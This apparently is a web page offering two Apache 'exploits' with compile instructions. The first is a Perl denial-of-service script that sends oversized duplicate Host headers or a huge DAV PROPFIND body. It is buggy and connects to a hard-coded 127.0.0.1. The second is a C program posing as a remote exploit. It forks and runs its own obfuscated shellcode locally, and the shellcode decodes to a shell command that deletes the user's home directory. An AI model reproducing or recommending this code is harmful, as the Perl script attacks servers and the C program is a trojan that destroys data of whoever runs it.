Exploit Apache 2.0.37-2.2.11

#!/usr/bin/perl
#
# Apache 2.0.37 - 2.0.45 APR Exploit
# Written By Matthew Murphy
#
$BASE64_CMD_STRING = "use_base64_encoder_here %s";


$BASE64_USE_STDIN = 0;


$BASE64_WRITE_NL = "";

use IO::Socket;
print STDOUT "Apache 2.0.37 - 2.0.45 Exploit\r\n";
print STDOUT "By Matthew Murphy\r\n\r\n";
print STDOUT "Enter the hostname/IP address of the server: ";
$line = <STDIN>;
$host = mychomp($line);
print STDOUT "Enter the port of the server \[80\]: ";
$line = <STDIN>;
$port = mychomp($line);
print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
   print STDOUT "What username shall we use: ";
   $line = <STDIN>;
   $user = mychomp($line);
   print STDOUT "What password shall we use: ";
   $line = <STDIN>;
   $pass = mychomp($line);
   $auth = "$user:$pass";
   if ($BASE64_USE_STDIN) {
      # l33t Perl piping trix; NOTE: This is definitely
      # Alpha code! :-)
      pipe(STDOUTREAD, STDOUTWRITE);
      pipe(STDINREAD, STDINWRITE);
      open(OLDSTDIN, "&STDIN");
      open(OLDSTDOUT, ">&STDOUT");
      open(STDIN, "&STDINREAD");
      open(STDOUT, ">&STDOUTWRITE");
      close(STDINREAD);
      close(STDOUTWRITE);
      system($BASE64_CMD_STRING);
      open(STDIN, "&OLDSTDIN");
      open(STDOUT, "&>OLDSTDOUT");
      close(OLDSTDIN);
      close(OLDSTDOUT);
      print STDINWRITE $auth;
      close(STDINWRITE);
      read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
      close(STDOUTREAD);
   } else {
      open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
      read(READOUTPUT, $base64, 4096); # See above
      close(READOUTPUT);
   }
   
   $base64 = join("", split(/ /, $base64));
} else {
   $base64 = undef;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
print STDOUT "Exploiting a proxy server \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
   print $f "GET / HTTP/1.1\x0d\x0a";

   # Apache 2.0.37 - 2.0.45 tries to limit header inputs, but uses a hash table
   # that ultimately concatenates multiple headers of the same name
   # together with ", " between them, so:
   #
   # Host: a
   # Host: b
   #
   # Bypasses Apache's buffer size checks, but ends up as:
   #
   # Host: a,b
   #
   # When processed.  Confirm this with a TRACE against your server:
   #
   # TRACE / HTTP/1.1
   # Host: a
   # Host: b
   #
   # The "message/http" body you receive will contain:
   #
   # TRACE / HTTP/1.1
   # Host: a,b
   #
   # So, for those of you who are confused by this code fragment,
   # this is what it ultimately achieves!
   for ($i = 0; $i < 10; $i++) {
      print $f "Host: ".("A"x2000)."\r\n";
   }
   if (defined($base64)) {
      print $f "Proxy-Authorization: Basic ".$base64."\r\n";
   }
   print $f "\r\n";
} else {
   print STDOUT "What resource should be probed: ";
   $line = <STDIN>;
   $res = mychomp($line);
   print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
   $line = <STDIN>;
   $char = mychomp($line);
   if ($char == "Y" || $char == "y") {
      
      $xmlbody = "<?xml version=\"1.0\"?>\r\n";
      $xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
      $xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
      $xmlbody.= "</D:propfind>";

      # HTTP headers
      print $f "PROPFIND $res HTTP/1.1\r\n";
      print $f "Host: $host:$port\r\n";
      print $f "Depth: 1\r\n";
      print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
      print $f "Content-Length: ".length($body)."\r\n\r\n";
      if (defined($base64)) {
         print $f "Authorization: Basic ".$base64."\r\n";
      }
      print $f "$xmlbody\r\n\r\n";
   } else {
      # This does *almost* the exact same thing as the mod_proxy
      # code, and could be considered wasteful, but a few extra
      # CPU cycles never killed anybody. :-(
      print $f "GET $res HTTP/1.1\r\n";
      for ($i = 0; $i < 10; $i++) {
         print $f "Host: ".("A"x2000)."\r\n";
      }
      if (defined($base64)) {
         print $f "Authorization: Basic ".$base64."\r\n";
      }
      print $f "\r\n";
   }
}
while (defined($ln = <$f>)) {
   print STDOUT $ln;
}
undef $f;
exit;


sub mychomp {
   my $data;
   my $arg = shift;
   my $CRLF;
   if ($^O == "MSWin32") {
      $CRLF = 1;
   } else {
      $CRLF = 0;
   }
   $data = substr($arg, 0, length($arg) - $CRLF);
   return $data;
}

gcc apache.c

atau

Compile: gcc apache.c -o apache

./a.out <hostname> <port>

atau

./apache <hostname> <port>

./apache 127.0.0.1 80

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

void usage(char *argv[])
{
    printf("Usage: %s <hostname> <port>\n\n",argv[0]);
    exit(1);
}



int main(int argc,char *argv[])
{
char *shellcode=
"\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"
"\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50"
"\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50"
"\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50"
"\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50"
"\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53"
"\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80";
int (*sc)()=(int(*)())shellcode;
char host[100];
int sd;
struct sockaddr_in sin;
struct sockaddr_in pin;
struct hostent *hp;
char *evilreq=malloc(4096);
pid_t pid;

    if (argc!=3) usage(argv);
    strcpy(host,argv[1]);
    if ((hp = gethostbyname(host)) == 0) {
   perror("gethostbyname");
   exit(2);
    }
    memset(&pin, 0, sizeof(pin));
    pin.sin_family = AF_INET;
    pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
    pin.sin_port = htons(atoi(argv[2]));

    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
   perror("socket");
   exit(1);
    }

    if (connect(sd,(struct sockaddr *)  &pin, sizeof(pin)) == -1) {
   perror("connect");
   exit(3);
    }
   
    printf("Connected,...\n");
   
   
    sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode);
   
    if (send(sd, evilreq, strlen(evilreq), 0) == -1) {
   perror("send");
   exit(1);
    }
   
    printf("Waiting some seconds...\n");
    pid=fork();
    if (pid==0) {close(2);sc();exit(0);}
    else
    {
   sleep(2);
   if (sd)
   {
       printf("Now type nc %s 12345 \n",argv[1]);
       close(sd);
   }
    }
   
}